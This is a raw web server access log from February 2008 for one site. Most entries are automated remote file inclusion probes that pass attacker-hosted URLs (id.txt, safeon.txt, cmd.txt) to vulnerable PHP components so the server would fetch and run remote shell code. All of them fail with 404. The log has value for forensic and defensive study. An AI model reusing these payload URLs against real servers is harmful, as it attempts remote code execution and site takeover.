69.72.221.130 - - [26/Feb/2008:08:43:19 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
96.229.92.128 - - [26/Feb/2008:08:43:30 -0800] "GET /bikes/dteel/2008_02_23/IMG_4598s.JPG HTTP/1.1" 200 227196 "http://www.st-owners.com/forums//showthread.php?t=36114" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
96.229.92.128 - - [26/Feb/2008:08:43:30 -0800] "GET /bikes/dteel/2008_02_23/IMG_4600s.JPG HTTP/1.1" 200 280447 "http://www.st-owners.com/forums//showthread.php?t=36114" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
96.229.92.128 - - [26/Feb/2008:08:43:32 -0800] "GET /bikes/dteel/2008_02_23/IMG_4563s.JPG HTTP/1.1" 200 322574 "http://www.st-owners.com/forums//showthread.php?t=36114" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
96.229.92.128 - - [26/Feb/2008:08:43:32 -0800] "GET /bikes/dteel/2008_02_23/IMG_4578s.JPG HTTP/1.1" 200 161693 "http://www.st-owners.com/forums//showthread.php?t=36114" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
96.229.92.128 - - [26/Feb/2008:08:43:32 -0800] "GET /bikes/dteel/2008_02_23/IMG_4582s.JPG HTTP/1.1" 200 163504 "http://www.st-owners.com/forums//showthread.php?t=36114" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
69.72.221.130 - - [26/Feb/2008:08:43:41 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.130 - - [26/Feb/2008:08:43:41 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.130 - - [26/Feb/2008:08:43:41 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.138.195.10 - - [26/Feb/2008:08:44:11 -0800] "GET /logs/access_080117.log/download.phphttp://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.138.195.10 - - [26/Feb/2008:08:44:11 -0800] "GET /download.phphttp://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.138.195.10 - - [26/Feb/2008:08:44:12 -0800] "GET /logs/access_080117.log/download.phphttp://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.138.195.10 - - [26/Feb/2008:08:44:12 -0800] "GET /logs/download.phphttp://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.138.195.10 - - [26/Feb/2008:08:44:12 -0800] "GET /logs/access_080117.log/download.phphttp://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.138.195.10 - - [26/Feb/2008:08:44:12 -0800] "GET /download.phphttp://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.138.195.10 - - [26/Feb/2008:08:44:12 -0800] "GET /download.phphttp://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.138.195.10 - - [26/Feb/2008:08:44:12 -0800] "GET /logs/download.phphttp://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.138.195.10 - - [26/Feb/2008:08:44:12 -0800] "GET /logs/download.phphttp://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.82.118.62 - - [26/Feb/2008:08:44:15 -0800] "GET /logs/access_080131.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.82.118.62 - - [26/Feb/2008:08:44:16 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [26/Feb/2008:08:44:24 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.236.107 - - [26/Feb/2008:08:44:48 -0800] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [26/Feb/2008:08:44:49 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [26/Feb/2008:08:44:49 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:08:44:49 -0800] "GET /logs/access_080119.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:08:44:49 -0800] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:08:44:50 -0800] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.117.237.134 - - [26/Feb/2008:08:44:50 -0800] "GET /logs/access_080123.log///config.php?inc_dir=http://www.zuuniimedee.mn//modules/My_eGallery/image/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.246 - - [26/Feb/2008:08:45:53 -0800] "GET /logs/access_080122.log/Administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.246 - - [26/Feb/2008:08:45:53 -0800] "GET /Administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.246 - - [26/Feb/2008:08:45:54 -0800] "GET /logs/Administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.246 - - [26/Feb/2008:08:45:55 -0800] "GET /logs/access_080122.log/Administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.246 - - [26/Feb/2008:08:45:56 -0800] "GET /Administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.246 - - [26/Feb/2008:08:45:56 -0800] "GET /logs/Administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.72.221.130 - - [26/Feb/2008:08:45:59 -0800] "GET /logs/access_080131.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:08:46:59 -0800] "GET /logs/access_080131.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.67.202.19 - - [26/Feb/2008:08:47:04 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ppunet.com/cache/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
212.67.202.19 - - [26/Feb/2008:08:47:05 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ppunet.com/cache/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
70.84.49.42 - - [26/Feb/2008:08:47:22 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
70.84.49.42 - - [26/Feb/2008:08:47:22 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
67.28.112.247 - - [26/Feb/2008:08:47:30 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.247 - - [26/Feb/2008:08:47:31 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.247 - - [26/Feb/2008:08:47:31 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.247 - - [26/Feb/2008:08:47:31 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.247 - - [26/Feb/2008:08:47:31 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.247 - - [26/Feb/2008:08:47:31 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.247 - - [26/Feb/2008:08:47:40 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.110.50.112 - - [26/Feb/2008:08:47:45 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.110.50.112 - - [26/Feb/2008:08:47:45 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.28.112.247 - - [26/Feb/2008:08:47:45 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.110.50.112 - - [26/Feb/2008:08:47:45 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.110.50.112 - - [26/Feb/2008:08:47:45 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.110.50.112 - - [26/Feb/2008:08:47:46 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.110.50.112 - - [26/Feb/2008:08:47:46 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.188.66.23 - - [26/Feb/2008:08:47:48 -0800] "GET /logs/access_080121.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [26/Feb/2008:08:47:49 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [26/Feb/2008:08:47:50 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.28.112.247 - - [26/Feb/2008:08:48:01 -0800] "GET /Administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.247 - - [26/Feb/2008:08:48:02 -0800] "GET /Administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.188.66.23 - - [26/Feb/2008:08:48:02 -0800] "GET /logs/access_080131.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.68.78 - - [26/Feb/2008:08:48:08 -0800] "GET /logs/access_080118.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.68.78 - - [26/Feb/2008:08:48:09 -0800] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.68.78 - - [26/Feb/2008:08:48:10 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.215.105 - - [26/Feb/2008:08:48:12 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.215.105 - - [26/Feb/2008:08:48:12 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.215.105 - - [26/Feb/2008:08:48:12 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.28.112.246 - - [26/Feb/2008:08:48:16 -0800] "GET /Administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.246 - - [26/Feb/2008:08:48:18 -0800] "GET /Administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.242 - - [26/Feb/2008:08:48:37 -0800] "GET /Components/com_performs/performs.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.242 - - [26/Feb/2008:08:48:40 -0800] "GET /Components/com_performs/performs.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.19.158.41 - - [26/Feb/2008:08:48:53 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [26/Feb/2008:08:48:54 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [26/Feb/2008:08:48:55 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.141.14 - - [26/Feb/2008:08:48:55 -0800] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.39.114 - - [26/Feb/2008:08:49:01 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.39.114 - - [26/Feb/2008:08:49:02 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.39.114 - - [26/Feb/2008:08:49:02 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:08:49:11 -0800] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:08:49:11 -0800] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:08:49:11 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:08:49:12 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.28.112.242 - - [26/Feb/2008:08:49:13 -0800] "GET /logs/access_080122.log/Components/com_performs/performs.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.242 - - [26/Feb/2008:08:49:13 -0800] "GET /logs/access_080122.log/Components/com_performs/performs.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.242 - - [26/Feb/2008:08:49:13 -0800] "GET /Components/com_performs/performs.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.242 - - [26/Feb/2008:08:49:13 -0800] "GET /Components/com_performs/performs.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.242 - - [26/Feb/2008:08:49:13 -0800] "GET /logs/Components/com_performs/performs.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.242 - - [26/Feb/2008:08:49:13 -0800] "GET /logs/Components/com_performs/performs.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.190.12 - - [26/Feb/2008:08:49:14 -0800] "GET /logs/access.log/lang=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [26/Feb/2008:08:49:21 -0800] "GET /lang=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [26/Feb/2008:08:49:23 -0800] "GET /logs/lang=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:08:49:33 -0800] "GET /plans/ HTTP/1.1" 200 974 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:08:49:41 -0800] "GET / HTTP/1.1" 200 3094 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:08:49:45 -0800] "GET /drop/ HTTP/1.1" 401 395 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
69.72.221.130 - - [26/Feb/2008:08:49:51 -0800] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:08:49:57 -0800] "GET /tmp/ HTTP/1.1" 200 828 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:08:50:02 -0800] "GET /tmp/sess_f18b7a8393bcbdb6165b41c9fb47715c HTTP/1.1" 403 163 "http://www.dmulk.com/tmp/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
81.209.112.115 - - [26/Feb/2008:08:50:15 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.209.112.115 - - [26/Feb/2008:08:50:16 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.1.132.59 - - [26/Feb/2008:08:50:16 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
81.209.112.115 - - [26/Feb/2008:08:50:16 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.1.132.59 - - [26/Feb/2008:08:50:16 -0800] "GET //skin/zero_vote/error.php?dir=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
189.1.132.59 - - [26/Feb/2008:08:50:17 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
67.28.112.247 - - [26/Feb/2008:08:50:20 -0800] "GET /logs/access_080122.log/Administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.247 - - [26/Feb/2008:08:50:21 -0800] "GET /Administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.247 - - [26/Feb/2008:08:50:22 -0800] "GET /logs/Administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.247 - - [26/Feb/2008:08:50:29 -0800] "GET /logs/access_080122.log/Administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.247 - - [26/Feb/2008:08:50:30 -0800] "GET /Administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.247 - - [26/Feb/2008:08:50:30 -0800] "GET /logs/Administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.190.12 - - [26/Feb/2008:08:50:38 -0800] "GET /logs/access_080201.log/lang=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.209.112.115 - - [26/Feb/2008:08:50:47 -0800] "GET /logs/access_080131.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.79.168.42 - - [26/Feb/2008:08:50:49 -0800] "GET /logs/access_071228.log/index.php?sub=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.168.42 - - [26/Feb/2008:08:50:49 -0800] "GET /index.php?sub=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.168.42 - - [26/Feb/2008:08:50:49 -0800] "GET /logs/index.php?sub=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
